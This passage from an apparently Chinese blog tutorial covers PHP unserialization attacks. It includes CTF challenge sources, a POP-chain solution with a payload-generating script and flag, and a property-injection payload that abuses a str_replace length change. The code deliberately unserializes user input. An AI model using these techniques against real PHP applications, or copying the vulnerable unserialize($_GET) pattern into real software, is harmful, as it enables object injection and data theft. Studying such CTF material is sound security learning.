class="string">&#x27;:2:&#x27;</span>,<span class="variable">$a</span>);</span><br><span class="line"><span class="comment">#再进行base64编码</span></span><br><span class="line"><span class="keyword">echo</span> base64_encode(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="2-test——CVE漏洞："><a href="#2-test——CVE漏洞：" class="headerlink" title="2.test——CVE漏洞："></a>2.test——CVE漏洞：</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">man</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$age</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$height</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$name</span>,<span class="variable">$age</span>,<span class="variable">$height</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;name = <span class="variable">$name</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;age = <span class="variable">$age</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;height = <span class="variable">$height</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">printdata</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;hello,this is the test of unserialize&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27; this_is_the_destruct! &#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$man</span>= <span class="string">&#x27;O:3:&quot;man&quot;:3:&#123;s:4:&quot;name&quot;;s:3:&quot;Bob&quot;;s:3:&quot;age&quot;;i:5;s:6:&quot;height&quot;;i:20;&#125;&#x27;</span>;</span><br><span class="line"><span class="variable">$Man</span> = unserialize(<span class="variable">$man</span>);</span><br><span class="line"><span class="comment">// var_dump($Man);</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$Man</span> == <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$Man</span>-&gt;printdata();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出为：</p>
<p><img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211105171146599.png" alt="image-20211105171146599"></p>
<p>将其中的一句更改为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$man</span>= <span class="string">&#x27;O:3:&quot;man&quot;:4:&#123;s:4:&quot;name&quot;;s:3:&quot;Bob&quot;;s:3:&quot;age&quot;;i:5;s:6:&quot;height&quot;;i:20;&#125;&#x27;</span>;<span class="comment">//将3-&gt;4，验证转化后unserialize的结果</span></span><br></pre></td></tr></table></figure>

<p>得到：<img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211105172250083.png" alt="image-20211105172250083"></p>
<p>可以看到<strong>执行了__destruct函数</strong>，说明反序列化了，得到了对象，但是可能不是正常对象，但可以执行对象在销毁时的魔术方法。同时不能执行对应类中的方法和属性值。</p>
<p>同时看到echo 输出来的结果是  1   ，所以看以看到传入的字符串不能反序列化：<strong>返回false</strong></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function unserialize(string $data [,<span class="built_in"> array </span>$options = []])</span><br><span class="line">从已存储的表示中创建 PHP 的值 unserialize() 对单一的已序列化的变量进行操作，将其转换回 PHP 的值。</span><br><span class="line"></span><br><span class="line">Returns:</span><br><span class="line"></span><br><span class="line">返回的是转换之后的值，可为 integer、 float、 string、<span class="built_in"> array </span>或 object。 如果传递的字符串不可反序列化，则返回 false ，并产生一个 E_NOTICE</span><br></pre></td></tr></table></figure>

<p>再看一个：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="literal">false</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>输出为：<img src="/2021/11/17/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users\SMY\AppData\Roaming\Typora\typora-user-images\image-20211105173938151.png" alt="image-20211105173938151"></p>
<p>即，bool值，为0</p>
<h4 id="pop链："><a href="#pop链：" class="headerlink" title="pop链："></a>pop链：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//简简单单POP链</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ChainSawMan</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$toolMan</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;toolMan=<span class="string">&quot;好耶!!!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="keyword">$this</span>-&gt;toolMan);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Makima</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$demon</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;demon=<span class="string">&quot;MeatFeast&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;万圣节!万圣节!万圣节!&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Power</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$BirthdayCake</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;BirthdayCake=<span class="string">&quot;pwn!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> (<span class="keyword">$this</span>-&gt;BirthdayCake)();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Reze</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$girl</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$ChasingFor</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;girl=<span class="string">&quot;bad&quot;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;ChasingFor=<span class="string">&quot;ChainSawMan&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;girl===<span class="string">&quot;dead&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor-&gt;heart;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">[写在前面]</span><br><span class="line">反序列化可以参考</span><br><span class="line">https:<span class="comment">//zhuanlan.zhihu.com/p/102166928</span></span><br><span class="line">解答中可能会出现<span class="string">&quot;类&quot;</span>和<span class="string">&quot;实例&quot;</span>这两个词组的混合使用,</span><br><span class="line">需要注意对于魔术方法来说,<span class="string">&quot;类&quot;</span>和<span class="string">&quot;实例&quot;</span>均能够触发</span><br><span class="line">只是由于出题人表达习惯,所以解答中可能一会说<span class="string">&quot;类&quot;</span>一会说<span class="string">&quot;实例&quot;</span></span><br><span class="line">类只是一个定义好的框架,实例就是其照着框架生成的变量,</span><br><span class="line">在魔术方法的触发上并不会有区别</span><br><span class="line"></span><br><span class="line">pop</span><br><span class="line"></span><br><span class="line">[介绍]</span><br><span class="line">简单的反序列化链,弄清魔术方法之间如何套接就好了,魔法函数可以参考</span><br><span class="line">https:<span class="comment">//blog.csdn.net/inqihoo/article/details/9235103</span></span><br><span class="line">魔术方法实际上就是PHP类中内置的一些特殊方法</span><br><span class="line">这些方法会在特定的条件下被自动触发</span><br><span class="line">[解答]</span><br><span class="line">反序列化的解答实际上就是理清反序列化的链(POP链)是如何一步步实现的,</span><br><span class="line">payload由附录中的PHP脚本生成</span><br><span class="line">(建议对着PHP脚本中对应的类的构造来看解答)</span><br><span class="line">先找反序列化的入口,本题中的入口是</span><br><span class="line">unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]);</span><br><span class="line">再找下最终要实现的代码,在Makima类中的</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;万圣节!万圣节!万圣节!&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">所以我们要构造一个POP链从入口开始触发魔术方法直到最终到Makima类中的__invoke魔术方法获取到flag</span><br><span class="line">先来看看入口处能触发哪个魔术方法</span><br><span class="line">__destruct</span><br><span class="line">unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]);讲传入的参数pop的值转化为对应的类</span><br><span class="line">这个过程在本题中并不能触发其他魔术方法</span><br><span class="line">但是请注意魔术方法__destruct</span><br><span class="line">这个魔术方法会在一个类对应的实例销毁时自动触发</span><br><span class="line">在PHP中脚本执行完成时所有变量(对应的数据)会被销毁,在一个数据没有被变量引用时也会被销毁</span><br><span class="line">本题中unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;pop&#x27;</span>]);虽然执行了反序列化获得了一个类</span><br><span class="line">但这个类并没有被赋值为任意一个变量,所以在反序列化完成后,这个反序列化得到的类被销毁了</span><br><span class="line">所以令反序列化得到的类为ChainSawMan,便能触发它的__destruct魔术方法</span><br><span class="line">执行其中的代码</span><br><span class="line"><span class="keyword">echo</span>(<span class="keyword">$this</span>-&gt;toolMan);</span><br><span class="line">__toString</span><br><span class="line">最终目的是执行到Makima类中的__invoke魔术方法,显然到上面还不够</span><br><span class="line">我们需要接着构造下去,</span><br><span class="line">我们的代码已经构造到了<span class="keyword">echo</span>(<span class="keyword">$this</span>-&gt;toolMan);</span><br><span class="line">而__toString会在一个类被当作字符串使用时触发</span><br><span class="line">如果让<span class="keyword">$this</span>-&gt;toolMan的值为定义了__toString魔术方法的Reze类即可触发</span><br><span class="line">我们便可以执行其中的代码</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;girl===<span class="string">&quot;dead&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor-&gt;heart;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor;</span><br><span class="line">此处先指明,为了进一步构造下去<span class="keyword">$this</span>-&gt;toolMan赋值的Reze类,</span><br><span class="line">其中的<span class="keyword">$this</span>-&gt;girl其值必须为<span class="string">&quot;dead&quot;</span>来执行</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor-&gt;heart;这行代码</span><br><span class="line">__get</span><br><span class="line">运行上述代码是为了能触发Power类中的__get魔术方法</span><br><span class="line">将<span class="keyword">$this</span>-&gt;ChasingFor赋值为Power类的一个实例,这样</span><br><span class="line"><span class="keyword">$this</span>-&gt;ChasingFor-&gt;heart实际上是Power类中的heart属性</span><br><span class="line">但是明显Power类不存在heart属性,这样便能触发__get魔术方法,</span><br><span class="line">执行<span class="keyword">return</span> (<span class="keyword">$this</span>-&gt;BirthdayCake)();</span><br><span class="line">__invoke</span><br><span class="line">魔术方法__invoke是在类被当作函数调用时触发</span><br><span class="line">如果让上面<span class="keyword">return</span> (<span class="keyword">$this</span>-&gt;BirthdayCake)();此处的<span class="keyword">$this</span>-&gt;BirthdayCake赋值为Makima类的实例</span><br><span class="line">这样就相当于去以函数的方式取调用Makima类,</span><br><span class="line">这样就能执行Makima类中的__invoke魔术方法中的代码</span><br><span class="line">也就能获得flag了</span><br><span class="line">[flag]</span><br><span class="line">flag&#123;f1r2_PuNch_t0_mAkIma&#125;</span><br><span class="line"></span><br><span class="line">[附录]</span><br><span class="line">[pop的payload文件]</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ChainSawMan</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$toolMan</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;toolMan=<span class="keyword">new</span> Reze();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Makima</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$demon</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;demon=<span class="string">&quot;MeatFeast&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Power</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$BirthdayCake</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;BirthdayCake=<span class="keyword">new</span> Makima();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$key</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;BirthdayCake();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Reze</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$girl</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$ChasingFor</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;girl=<span class="string">&quot;dead&quot;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;ChasingFor=<span class="keyword">new</span> Power();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;girl===<span class="string">&quot;dead&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor-&gt;heart;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;ChasingFor;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> ChainSawMan();</span><br><span class="line">var_dump(serialize(<span class="variable">$a</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h4 id="反序列化变量覆盖："><a href="#反序列化变量覆盖：" class="headerlink" title="反序列化变量覆盖："></a>反序列化变量覆盖：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//注意这里实际上实例化了两个extract类</span></span><br><span class="line"><span class="comment">//所以最终脚本结束销毁变量时会触发两次__dextruct</span></span><br><span class="line"><span class="comment">//如果payload正确你只会看到一句try again而不是两句</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">extract</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$var</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$arg</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;var=<span class="variable">$arg</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;key=<span class="string">&quot;this_is_not_a_secret&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;key===<span class="string">&quot;this_is_a_secret&quot;</span>)</span><br><span class="line">        <span class="keyword">echo</span>(<span class="variable">$flag</span>);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;try again&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$cls</span>=<span class="keyword">new</span> extract(<span class="variable">$_GET</span>[<span class="string">&#x27;value&#x27;</span>]);</span><br><span class="line"><span class="variable">$serializeStr</span>=str_replace(<span class="string">&#x27;wot&#x27;</span>,<span class="string">&#x27;what&#x27;</span>,serialize(<span class="variable">$cls</span>));</span><br><span class="line"><span class="variable">$newcls</span>=unserialize(<span class="variable">$serializeStr</span>);</span><br><span class="line"><span class="meta">?&gt;</span> <span class="keyword">try</span> againtry again</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">考的是序列化里面的变量覆盖</span><br><span class="line">序列化实际上是按照一定规则把类里面的变量保存成字符串</span><br><span class="line">反序列化则是按照这个规则反向从字符串中解析出变量</span><br><span class="line">但问题在于反序列化只是一种单纯的数据类型转换方式,</span><br><span class="line">转换的结果完全在于反序列化的字符串里面的字符内容</span><br><span class="line">所以我们完全可以按照序列化的规则自己构造出包含任意值字符串对正常序列化后的字符串拼接,替换</span><br><span class="line">(这套规则可以参考https://www.cnblogs.com/webu/archive/2013/01/28/2879383.html)</span><br><span class="line">反序列时仍然能够正常解析为我们涉及的值,如</span><br><span class="line">class <span class="built_in">test</span>&#123;</span><br><span class="line"><span class="variable">$test</span>=<span class="string">&quot;hi&quot;</span>;&#125;</span><br><span class="line">序列化的结果是字符串</span><br><span class="line">O:4:<span class="string">&quot;test&quot;</span>:1:&#123;s:4:<span class="string">&quot;test&quot;</span>;s:2:<span class="string">&quot;hi&quot;</span>;&#125;</span><br><span class="line">按照序列化的规则我们完全新增一个值为字符串<span class="string">&quot;123&quot;</span>的变量a,只需要对上述字符串进行小小的修改,如</span><br><span class="line">O:4:<span class="string">&quot;test&quot;</span>:2:&#123;s:4:<span class="string">&quot;test&quot;</span>;s:2:<span class="string">&quot;hi&quot;</span>;s:1:<span class="string">&quot;a&quot;</span>;s:3:<span class="string">&quot;123&quot;</span>;&#125;</span><br><span class="line">反序列后得到的类也就对应多了一个值为字符串<span class="string">&quot;123&quot;</span>的变量a</span><br><span class="line">本题的考点实际上也就是类似于这种操作</span><br><span class="line">人为的修改序列化后得的字符串,使得extract类中的key属性值发生变化</span><br><span class="line">具体操作在解答部分中解释</span><br><span class="line">[解答]</span><br><span class="line">先给出payload</span><br><span class="line">?value=wotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwotwot<span class="string">&quot;;s:3:&quot;</span>key<span class="string">&quot;;s:16:&quot;</span>this_is_a_secret<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">本题和介绍中描述情况的差别是,我们输入的所有内容只会赋值为extract类的arg属性的值</span></span><br><span class="line"><span class="string">我们并不存在对extract类序列化,或者反序列化结果的直接掌控</span></span><br><span class="line"><span class="string">可控点在于str_replace(&#x27;wot&#x27;,&#x27;what&#x27;,serialize(<span class="variable">$cls</span>))此处代码</span></span><br><span class="line"><span class="string">将序列化后字符串中的所有wot替换为what</span></span><br><span class="line"><span class="string">需要注意的是,序列化时已经按照规则固定好了各部分的长度和内容</span></span><br><span class="line"><span class="string">像这样强行替换值可能会导致错误(也就是本题的利用点),以介绍中的test类为例</span></span><br><span class="line"><span class="string">假设正常序列化结果为</span></span><br><span class="line"><span class="string">O:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;:1:&#123;s:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;;s:3:&quot;</span>wot<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">经过替换变成了</span></span><br><span class="line"><span class="string">O:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;:1:&#123;s:4:&quot;</span><span class="built_in">test</span><span class="string">&quot;;s:3:&quot;</span>what<span class="string">&quot;;&#125;</span></span><br><span class="line"><span class="string">反序列化时按照规则s:2:&quot;</span>what<span class="string">&quot;;这一段前面的s:2实际上规定了</span></span><br><span class="line"><span 